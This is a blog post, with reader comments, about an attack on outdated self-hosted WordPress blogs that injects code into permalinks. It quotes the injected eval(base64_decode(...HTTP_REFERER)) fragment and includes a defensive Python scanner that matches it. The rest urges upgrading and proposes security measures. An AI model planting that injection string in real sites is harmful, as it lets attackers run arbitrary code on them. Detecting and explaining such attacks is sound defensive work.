My apologies for not updating the blog for such a long time. Thanks to Vivekk for pointing it out to me and reminding me how much he misses the content of this blog (which definitely makes me feel good). Coming back to the actual post: the talk of WordPress not being a secure blog engine, and the questions being raised about its security, tell me how we all tend to blame others for our own faults!

Recently there have been reports that older versions of self-hosted WordPress blogs are under attack by an online creature nicknamed “eval/base64_decode”, which changes the permalinks (URL structure) of your blog posts to something like: example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.
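As an added defender-side example (not code from the original post), here is a small Python check that flags the injected PHP fragment inside a permalink structure, whether the value is given directly or pulled out of a wp_options database dump. The sample rows are constructed; the infected value is the one quoted above, where the `eval(base64_decode($_SERVER[HTTP_REFERER]))` part executes whatever the attacker sends in the Referer header.

```python
import re

# Indicators that must never appear inside a WordPress permalink structure.
# Braces and brackets may show up URL-encoded (%7B, %5B) as in the attacked
# links, so the pattern matches both the raw and the encoded spellings.
SUSPICIOUS = re.compile(
    r"eval\s*\(|base64_decode|\$_(?:SERVER|GET|POST|REQUEST|COOKIE)|\$(?:\{|%7B)",
    re.IGNORECASE,
)

def findings(structure):
    """Return the distinct suspicious tokens found in one permalink structure."""
    return sorted({m.group(0).lower() for m in SUSPICIOUS.finditer(structure)})

def is_compromised(structure):
    """True when the permalink structure carries injected code."""
    return bool(findings(structure))

# Matches the permalink_structure row in a mysqldump-style INSERT statement.
OPTION_ROW = re.compile(r"'permalink_structure',\s*'((?:[^'\\]|\\.)*)'")

def scan_options_dump(lines):
    """Scan wp_options dump lines and return (value, findings) for each
    permalink_structure row found."""
    results = []
    for line in lines:
        m = OPTION_ROW.search(line)
        if m:
            results.append((m.group(1), findings(m.group(1))))
    return results

# Constructed sample data: a clean structure and the injected one from the post.
CLEAN = "/%category%/%postname%/"
INFECTED = ("/%category%/%postname%/%&(%7B$%7Beval(base64_decode("
            "$_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/")
DUMP = [
    "INSERT INTO wp_options VALUES (3,'siteurl','http://example.com','yes');",
    "INSERT INTO wp_options VALUES (27,'permalink_structure','" + INFECTED + "','yes');",
]

if __name__ == "__main__":
    for value, hits in scan_options_dump(DUMP):
        print("COMPROMISED" if hits else "clean", value, hits)
```

If the check fires, resetting the permalink structure from the WordPress settings screen (and upgrading) removes the injected code, but the blog should still be treated as compromised until the admin accounts and files have been reviewed.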

Why do I say that it’s our own fault?

The WordPress team has been working hard all the time to give us new features in every new version, and they have been quick to ship security updates whenever one is needed. It’s only the bloggers who don’t give these updates their due importance by not updating their engines, and yet we raise questions about WordPress security or play the blame game after our blogs get attacked by these nasty tricks played by “some jerk”.

Would it not be your fault if you didn’t lock the doors of your house and went out on a holiday? Would it not be like giving an open invitation to thieves? It’s exactly the same here: by not upgrading your WordPress installation, you are inviting hackers to exploit your blog.

What can I do to keep my blog safe?

I’ve already written a series on how to secure your WordPress installation, and I’m sure those safety measures will keep your blog safe from prying eyes. Those are the precautions you can take beforehand. If your blog has already been hit by “eval/base64_decode”, then go ahead and follow this FAQ on how you can recover from this nasty attack.

Suggestions for the Automattic team

Considering how WordPress has grown on the internet, and how other engines are secure enough that they don’t get attacked by these exploits (it’s much the same as why Microsoft Windows gets viruses and other operating systems don’t), here are some suggestions for the Automattic team that they should implement to keep things more secure than ever -

1. Certify the plugins – This wonderful suggestion came from Allen Stern, and I think he’s right on the money. If there were a system in WordPress, or someone who looked at the code of every plugin uploaded to WordPress Extend, it would give bloggers more assurance about the authenticity of the plugin.

2. Put some watchdog in place – Corsin Camichel suggests that it would be nice if bloggers got an automated daily report from their WordPress installation telling them about the activity on the blog. I’m sure a person will be alerted if he sees that 30 new posts were added to his/her blog while he was busy somewhere else.

3. Educate users through WordPress.TV – WordPress.TV is an excellent resource with lots of videos that educate users about various parts of WordPress. I’m sure bloggers would appreciate more videos (other than this video) on the topic of security and what they can do to keep their blogs safe from prying eyes.

If you have any more suggestions for the Automattic team, then why not take part in the conversation and let them know what we are expecting from them! <sarcasm>After all, it was their fault that they built such a wonderful app; people will automatically have a lot more expectations of them.</sarcasm>

Does your blog not look as cool as other blogs? Feel free to contact us (free quote) and we’d love to help you build a beautiful blog!

6 Responses so far | Have Your Say!

  1. Thanks for linking to me and keeping the discussion alive.
    I discussed the whole incident a little bit with Allen yesterday. And as much as I like the idea of certifying plugins, I wonder what happens to all the plugins I wrote for just one of my blogs? If WordPress allows installing uncertified plugins, the system is broken already. And if they do not allow that, my plugins are useless. It is going to be hard to have a balance between the two.

    • @corsin – thanks for dropping by and keeping the discussion going :) As for the plugins that one has developed for his/her own blog, that means they already know the plugin is safe to use and that it will not be malicious. Other than that, it will be good if WordPress certifies the plugins – that process will encourage plugin developers to get their plugins certified, as it will give plugin users assurance that they are using a safe plugin and that it’s not malicious. This process will take time; eventually it will become part of the system.. isn’t it :)

  2. Hi Mayank
    I hope my plugins are safe :) at least they should be.
    My thoughts go more in the direction of what happens once WordPress only allows installing verified/certified plugins. I do not think somebody wants to certify my plugin that creates a database connection and returns a random joke :-)

  3. Thanks for the links! This whole exploit blowup has been interesting to watch. I’ve been hit so many times over the last 3 months that I should become a hacker :)

  4. Alex

    Re Corsin’s suggestion, I’ve made ismyblogworking.com detect this exploit and several others. If you subscribe to the RSS feed there for your blog(s) you’ll get an update if your blog is compromised by one of them. It’ll also warn you to update if your copy of WordPress is out of date (cough cough).

  5. Wow, what luck I stumbled on this today. I just noticed that my WordPress permalinks had changed, and couldn’t for the life of me figure out what had happened.

    So yes, I must be one of the lazy bloggers who doesn’t upgrade their platform enough :)